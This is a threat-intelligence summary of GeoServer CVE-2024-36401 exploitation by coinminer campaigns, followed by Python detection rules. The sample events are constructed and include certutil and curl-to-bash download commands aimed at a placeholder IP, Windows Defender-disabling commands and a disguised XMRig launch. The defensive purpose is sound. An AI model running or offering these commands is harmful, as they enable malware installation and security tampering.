GeoServer RCE Exploited in CoinMiner Campaigns (Campaign)
ID: 8c559681-1b02-5091-aa8e-d8f05301f06b
STIX ID: report--8c559681-1b02-5091-aa8e-d8f05301f06b
Feed Name: Wiz Cloud Threat Landscape
Date Published: 2026-01-24
Date Updated: 2026-05-01
Author: [email protected] (Wiz Threat Research)
Researchers observed active exploitation of the GeoServer remote code execution vulnerability CVE-2024-36401 in multiple coinminer campaigns that download and install XMRig using PowerShell, Bash, and certutil-based droppers. Three campaign types were identified: simple script-based deployments; certutil droppers that fetch a RAR self-extracting archive (SFX) and register a disguised XMRig binary as a Windows service via NSSM for persistence; and hybrid campaigns that additionally deploy remote-access tooling and attempt to disable Windows Defender so the miner is not removed.
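The dropper chain summarized above (certutil download, NSSM service registration, Defender tampering, an XMRig binary renamed to look like a system process) maps directly onto process-creation telemetry. The rules below are an added example written for this page, not Wiz code or indicators from the campaign: the pipe-delimited event format, host names, paths, service names and the TEST-NET-2 address are all constructed. The parent-process rule relies only on GeoServer being a Java application, so the process that spawns the first shell is `java`/`java.exe`.

```python
"""Detection rules for the GeoServer-to-XMRig dropper chain summarized above.
Added example for this page, not Wiz code or telemetry: the event format
(ts|host|parent_image|image|command_line) and every sample event are constructed."""
import re
from dataclasses import dataclass
from typing import Dict, List

# Constructed process-creation events. 198.51.100.7 is a documentation (TEST-NET-2) address.
SAMPLE_EVENTS = [
    r"2026-01-20T10:00:01Z|geo-win-01|C:\Program Files\Java\jre\bin\java.exe|C:\Windows\System32\cmd.exe|cmd.exe /c certutil -urlcache -split -f http://198.51.100.7/x.rar C:\ProgramData\x.rar",
    r"2026-01-20T10:00:02Z|geo-win-01|C:\Windows\System32\cmd.exe|C:\Windows\System32\certutil.exe|certutil -urlcache -split -f http://198.51.100.7/x.rar C:\ProgramData\x.rar",
    r"2026-01-20T10:00:09Z|geo-win-01|C:\ProgramData\x.exe|C:\ProgramData\WinUpdate\nssm.exe|nssm.exe install WinUpdateSvc C:\ProgramData\WinUpdate\svchost.exe",
    r"2026-01-20T10:00:12Z|geo-win-01|C:\ProgramData\x.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -nop -w hidden -c Set-MpPreference -DisableRealtimeMonitoring $true",
    r"2026-01-20T10:00:13Z|geo-win-01|C:\ProgramData\x.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -c Add-MpPreference -ExclusionPath C:\ProgramData\WinUpdate",
    r"2026-01-20T10:00:20Z|geo-win-01|C:\ProgramData\WinUpdate\nssm.exe|C:\ProgramData\WinUpdate\svchost.exe|svchost.exe -o pool.example.invalid:3333 -u 4constructedWalletAddress -a rx/0 --donate-level 1 --cpu-max-threads-hint 75",
    r'2026-01-20T10:05:00Z|geo-lnx-01|/usr/bin/java|/bin/bash|bash -c "curl -fsSL http://198.51.100.7/s.sh | bash"',
    # Benign activity that the rules must not flag.
    r"2026-01-20T11:00:00Z|admin-ws-02|C:\Windows\explorer.exe|C:\Windows\System32\certutil.exe|certutil -verify C:\certs\server.cer",
    r"2026-01-20T11:00:05Z|admin-ws-02|C:\Windows\explorer.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -c Get-MpPreference",
    r"2026-01-20T11:00:09Z|admin-ws-02|C:\Windows\explorer.exe|C:\Tools\nssm.exe|nssm.exe status BackupAgent",
]


@dataclass(frozen=True)
class Hit:
    rule: str
    ts: str
    host: str
    detail: str


def _base(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return re.split(r"[\\/]", path)[-1].lower()


URL_RE = re.compile(r"https?://\S+", re.I)
CERTUTIL_RE = re.compile(r"\bcertutil(?:\.exe)?\b.*\burlcache\b", re.I)
NSSM_INSTALL_RE = re.compile(r"\binstall\s+(\S+)\s+(\S+)", re.I)
DEFENDER_RE = re.compile(
    r"Set-MpPreference\b.*-Disable\w+|Add-MpPreference\b.*-Exclusion(?:Path|Process|Extension)", re.I)
PIPE_TO_SHELL_RE = re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:ba)?sh\b", re.I)
# XMRig-specific options (left) versus short options shared with many tools (right).
XMRIG_DISTINCT_RE = re.compile(
    r"--donate-level|--coin\b|--algo\b|--cpu-max-threads-hint|--randomx|--nicehash|"
    r"stratum\+(?:tcp|ssl)://|\brx/0\b", re.I)
XMRIG_SHORT_RE = re.compile(r"(?<!\S)-[ouak](?!\S)")
JAVA = {"java", "java.exe", "javaw.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "certutil.exe", "bash", "sh", "bash.exe"}
SYSTEM_NAMES = {"svchost.exe", "lsass.exe", "csrss.exe", "services.exe", "winlogon.exe", "dllhost.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def scan_event(line: str) -> List[Hit]:
    """Apply every rule to one event; a single event may produce several hits."""
    parts = line.strip().split("|", 4)  # maxsplit keeps '|' inside the command line intact
    if len(parts) != 5:
        return []
    ts, host, parent, image, cl = parts
    pimg, img = _base(parent), _base(image)
    hits: List[Hit] = []

    # 1. GeoServer runs in a JVM, so the JVM spawning a shell or certutil is the first post-exploit signal.
    if pimg in JAVA and img in SHELLS:
        hits.append(Hit("java_spawns_shell", ts, host, f"{pimg} -> {img}"))
    # 2. certutil as a downloader: -urlcache together with a URL, whichever process typed it.
    if CERTUTIL_RE.search(cl) and (m := URL_RE.search(cl)):
        hits.append(Hit("certutil_download", ts, host, m.group(0)))
    # 3. NSSM registering a service; note a system-binary name installed outside System32.
    if img == "nssm.exe" and (m := NSSM_INSTALL_RE.search(cl)):
        svc, prog = m.group(1), m.group(2)
        note = " (system-binary name outside System32)" if (
            _base(prog) in SYSTEM_NAMES and not prog.lower().startswith(SYSTEM_DIRS)) else ""
        hits.append(Hit("nssm_service_install", ts, host, f"{svc} -> {prog}{note}"))
    # 4. Defender tampering through the MpPreference cmdlets.
    if DEFENDER_RE.search(cl):
        hits.append(Hit("defender_tamper", ts, host, cl))
    # 5. Bash dropper: curl/wget piped straight into a shell.
    if PIPE_TO_SHELL_RE.search(cl):
        hits.append(Hit("download_pipe_to_shell", ts, host, cl))
    # 6. XMRig command line regardless of the renamed file: one distinctive option and three in total.
    distinct = len(XMRIG_DISTINCT_RE.findall(cl))
    if distinct >= 1 and distinct + len(XMRIG_SHORT_RE.findall(cl)) >= 3:
        hits.append(Hit("xmrig_cmdline", ts, host, f"{img}: {cl}"))
    return hits


def scan(lines: List[str]) -> List[Hit]:
    return [h for line in lines for h in scan_event(line)]


def rule_counts(lines: List[str]) -> Dict[str, int]:
    """Number of hits per rule, handy for a quick triage summary."""
    counts: Dict[str, int] = {}
    for h in scan(lines):
        counts[h.rule] = counts.get(h.rule, 0) + 1
    return counts


if __name__ == "__main__":
    for h in scan(SAMPLE_EVENTS):
        print(f"{h.ts} {h.host} {h.rule}: {h.detail}")
```

Each rule alone is noisy on a busy estate; what makes the chain convincing is several of them firing on one host within minutes, in the order the summary describes (JVM spawns shell, certutil fetch, NSSM install, Defender change, miner command line), so correlate the hits by host before paging anyone.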
